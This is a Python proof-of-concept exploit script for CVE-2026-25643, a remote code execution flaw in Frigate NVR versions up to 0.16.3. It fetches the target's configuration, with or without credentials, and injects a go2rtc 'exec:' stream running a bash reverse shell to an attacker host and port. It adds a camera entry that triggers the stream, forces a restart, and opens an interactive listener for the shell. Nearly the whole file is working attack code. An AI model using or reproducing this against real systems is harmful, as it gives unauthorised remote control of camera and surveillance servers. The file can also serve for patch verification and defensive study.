# 4837 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / frigate_rce.py PY
# Exploit Title: Frigate NVR <= 0.16.3 - RCE (Authenticated & Unauthenticated)
# Date: 2026-02-05
# Exploit Author: jduardo2704
# Vendor Homepage: https://frigate.video/
# Software Link: https://github.com/blakeblackshear/frigate
# Version: <= 0.16.3
# Tested on: Linux / Docker
# CVE: CVE-2026-25643
# Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

import requests
import argparse
import sys
import json
import urllib3
import yaml
import time
import socket
import threading
import select
import re

# Silence SSL warnings
# (requests in this file are sent with certificate verification disabled,
# which would otherwise emit an InsecureRequestWarning on every call)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Colors
# ANSI escape sequences used by print_status() to colorize terminal output.
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
RESET = '\033[0m'  # appended after every message to restore default attributes

# Event to synchronize the listener with the exploit thread
# Set by inject_and_exploit() once the configuration has been fetched and
# modified; shell_handler() waits on it before binding its socket.
exploit_ready = threading.Event()

def print_status(msg, color=BLUE, symbol="[*]"):
    """Print *msg* to stdout, prefixed by *symbol* and wrapped in *color*.

    The color escape sequence is emitted first and ``RESET`` last, so the
    coloring never leaks into subsequent terminal output.
    """
    prefix = f"{color}{symbol} "
    print(prefix + f"{msg}" + RESET)

def login_frigate(session, url, username, password):
    """Attempt to log in through the ``/api/login`` endpoint.

    Args:
        session: ``requests.Session`` used for the request. The caller keeps
            using the same session object for its later requests.
        url: Base URL of the service, without a trailing slash.
        username: Value sent as the ``user`` field of the JSON body.
        password: Value sent as the ``password`` field of the JSON body.

    Returns:
        True if the server answered with HTTP 200; False for any other
        status code or when the request itself failed (connection error,
        timeout, malformed URL, ...).
    """
    print_status(f"Authenticating as {username}...", BLUE)
    try:
        res = session.post(
            f"{url}/api/login",
            json={"user": username, "password": password},
            verify=False,
            timeout=10,
        )
    except requests.RequestException:
        # Only transport-level failures are treated as "login failed";
        # anything else is a programming error and should surface.
        return False
    return res.status_code == 200

def get_config(session, url):
    """Fetch ``/api/config/raw`` and parse the body as YAML.

    The response body is accepted in two forms: when it starts with a double
    quote it is first decoded as a JSON string (falling back to the raw text
    if that decoding fails); otherwise it is used as-is. The resulting text
    is then parsed with ``yaml.safe_load``.

    Args:
        session: ``requests.Session`` used for the request.
        url: Base URL of the service, without a trailing slash.

    Returns:
        Whatever ``yaml.safe_load`` produces for the body, or None when the
        request fails or the body cannot be parsed. The HTTP status code is
        not inspected, so callers must validate the returned object.
    """
    try:
        res = session.get(f"{url}/api/config/raw", timeout=10)
    except requests.RequestException:
        return None

    content = res.text.strip()
    config_raw = content
    if content.startswith('"'):
        try:
            config_raw = json.loads(content)
        except ValueError:
            # json.JSONDecodeError is a ValueError: the body only looked like
            # a JSON string, so keep the raw text.
            config_raw = content

    try:
        return yaml.safe_load(config_raw)
    except (yaml.YAMLError, ValueError):
        # ValueError covers scalar-construction failures (e.g. an invalid
        # timestamp) that PyYAML does not wrap in YAMLError.
        return None

def send_payload(session, url, data):
    """Serialize *data* to YAML and POST it to ``/api/config/save?save_option=restart``.

    The request is best-effort: any exception raised by the POST is discarded
    and the function returns None regardless of the outcome. ``yaml.dump`` is
    called outside the ``try`` block, so a serialization error propagates to
    the caller.
    """
    final_yaml = yaml.dump(data)
    try:
        session.post(
            f"{url}/api/config/save?save_option=restart", 
            data=final_yaml, 
            headers={"Content-Type": "text/plain"}, 
            timeout=5 
        )
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit. Presumably the swallow is intentional because the
        # requested restart can drop the connection before a response
        # arrives -- confirm, and consider narrowing the exception type.
        pass 

def inject_and_exploit(url, username, password, lhost, lport):
    """Function to run in background thread.

    Optionally logs in, fetches the current configuration, adds one go2rtc
    stream entry and one camera entry to it, sets ``exploit_ready`` so that
    the listener starts, waits five seconds, and posts the modified
    configuration back with send_payload().

    Args:
        url: Base URL of the service (main() strips any trailing slash).
        username: Login name; authentication is skipped unless both
            *username* and *password* are truthy.
        password: Login password; see *username*.
        lhost: Address interpolated into the stream command string.
        lport: Port interpolated into the stream command string.

    NOTE(review): main() starts this function as a non-main thread, so the
    ``sys.exit(1)`` calls below raise SystemExit in this thread only; the
    process keeps running and shell_handler() then waits out its own timeout
    on ``exploit_ready``.
    """
    session = requests.Session()
    # Certificate verification is disabled for every request on this session.
    session.verify = False

    # 1. AUTHENTICATION LOGIC
    if username and password:
        if not login_frigate(session, url, username, password):
            print_status("Login failed with provided credentials.", RED, "[-]")
            sys.exit(1) 
        print_status("Logged in successfully.", BLUE)
    else:
        print_status("No credentials provided. Trying unauthenticated access...", YELLOW)

    # 2. CONFIG RETRIEVAL & VALIDATION
    print_status("Fetching configuration...", BLUE)
    config = get_config(session, url)
    
    # get_config() returns None on failure; an empty or non-mapping document
    # is rejected as well because the code below indexes it by key.
    if not config or not isinstance(config, dict):
        print_status("Failed to retrieve a valid configuration dictionary.", RED, "[-]")
        print_status("Target might be authenticated or API is restricted.", RED, "[-]")
        sys.exit(1)

    # 3. PAYLOAD PREPARATION
    try:
        payload = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
        
        # Inject go2rtc
        # Missing or null sections are replaced by empty dicts so the nested
        # assignment cannot fail; existing entries are kept.
        if 'go2rtc' not in config or config['go2rtc'] is None: config['go2rtc'] = {}
        if 'streams' not in config['go2rtc'] or config['go2rtc']['streams'] is None: config['go2rtc']['streams'] = {}
        config['go2rtc']['streams']['cve_poc'] = [f"exec:{payload}"]

        # Inject camera trigger
        # The camera's input path refers to the stream name added above.
        if 'cameras' not in config or config['cameras'] is None: config['cameras'] = {}
        config['cameras']['cve_trigger'] = {
            'ffmpeg': {'inputs': [{'path': 'rtsp://127.0.0.1:8554/cve_poc', 'roles': ['detect']}]},
            'detect': {'enabled': False},
            'audio': {'enabled': False}, 
            'enabled': True
        }
        
        print_status("Payload injected into config structure.", GREEN, "[+]")

        # 4. SIGNAL LISTENER TO START
        # The event releases shell_handler(); the fixed delay gives it time
        # to bind and listen before the configuration is posted.
        exploit_ready.set()
        time.sleep(5) 
        print_status("Sending malicious config & triggering restart...", YELLOW)
        send_payload(session, url, config)

    except Exception as e:
        # SystemExit is not an Exception subclass, so only ordinary errors
        # from the block above land here.
        print_status(f"Error during payload injection: {e}", RED, "[-]")
        sys.exit(1)

def shell_handler(lport):
    """Handles the incoming reverse shell connection.

    Waits up to 20 seconds for ``exploit_ready``, then listens on all
    interfaces at *lport*, accepts a single connection (60 second timeout)
    and relays data between that connection and the local terminal until the
    peer closes the connection or the user interrupts.

    Args:
        lport: Port to listen on; converted with ``int()`` before binding.

    Returns:
        None in every case. Failures are reported through print_status().
    """
    
    print_status("Waiting for validation...", BLUE)
    # Event.wait() returns False when the timeout elapses without the event
    # being set, i.e. the worker thread never reached its signalling step.
    if not exploit_ready.wait(timeout=20): 
        print_status("Timeout waiting for exploit thread validation.", RED, "[-]")
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow re-binding the port right after a previous run.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    
    try:
        s.bind(('0.0.0.0', int(lport)))
        s.listen(1)
        print_status(f"Validation OK. Listening on 0.0.0.0:{lport}...", GREEN, "[+]")
        # Bounds the accept() call below; raises socket.timeout on expiry.
        s.settimeout(60) 
        
        try:
            conn, addr = s.accept()
            print_status(f"Connection received from {addr[0]}!", GREEN, "[+]")
            print(f"{YELLOW}--- SHELL ESTABLISHED ---\n{RESET}")
            
            # Switch both sockets back to blocking mode for the relay loop.
            s.settimeout(None) 
            conn.settimeout(None)

            # NOTE(review): conn is never closed explicitly; only the
            # listening socket is closed in the finally block below.
            while True:
                # Block until the terminal or the connection has data.
                r, _, _ = select.select([sys.stdin, conn], [], [])
                
                if conn in r:
                    data = conn.recv(4096)
                    # An empty read means the peer closed the connection.
                    if not data: break
                    
                    # CLEAN OUTPUT LOGIC
                    output = data.decode(errors='ignore')
                    
                    # Remove annoying bash TTY errors using Regex
                    # Matches "bash: cannot set terminal process group (PID): Inappropriate ioctl..."
                    # NOTE(review): filtering is applied per received chunk,
                    # so a message split across two recv() calls is not removed.
                    output = re.sub(r"bash: cannot set terminal process group \(\d+\): Inappropriate ioctl for device\r?\n?", "", output)
                    # Matches "bash: no job control in this shell"
                    output = output.replace("bash: no job control in this shell\r\n", "")
                    output = output.replace("bash: no job control in this shell\n", "")
                    
                    sys.stdout.write(output)
                    sys.stdout.flush()
                    
                if sys.stdin in r:
                    # NOTE(review): at stdin EOF readline() returns '' and
                    # select() keeps reporting stdin as readable, so this
                    # branch would spin -- confirm whether EOF should end the loop.
                    cmd = sys.stdin.readline()
                    conn.send(cmd.encode())

        except socket.timeout:
            print_status("Exploit sent but no connection received (Timeout > 60s).", RED, "[-]")

    except KeyboardInterrupt:
        print_status("\nClosing connection.", RED)
    except Exception as e:
        print_status(f"Listener error: {e}", RED)
    finally:
        s.close()

def main():
    """Parse the command line, start the worker thread and run the listener.

    The worker (inject_and_exploit) runs as a daemon thread so that it cannot
    keep the process alive once shell_handler() returns in the main thread.
    """
    cli = argparse.ArgumentParser(description="Frigate <= 0.16.3 RCE (Auto-Shell) - CVE-2026-25643")

    # (short flag, long flag, required, help text)
    option_table = (
        ('-u', '--url', True, "Target URL"),
        ('-U', '--username', False, "Username (optional)"),
        ('-P', '--password', False, "Password (optional)"),
        ('-lh', '--lhost', True, "Your IP (LHOST)"),
        ('-lp', '--lport', True, "Your Port (LPORT)"),
    )
    for short_flag, long_flag, is_required, help_text in option_table:
        cli.add_argument(short_flag, long_flag, required=is_required, help=help_text)
    opts = cli.parse_args()

    base_url = opts.url.rstrip('/')
    worker = threading.Thread(
        target=inject_and_exploit,
        args=(base_url, opts.username, opts.password, opts.lhost, opts.lport),
        daemon=True,
    )
    worker.start()

    shell_handler(opts.lport)

# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()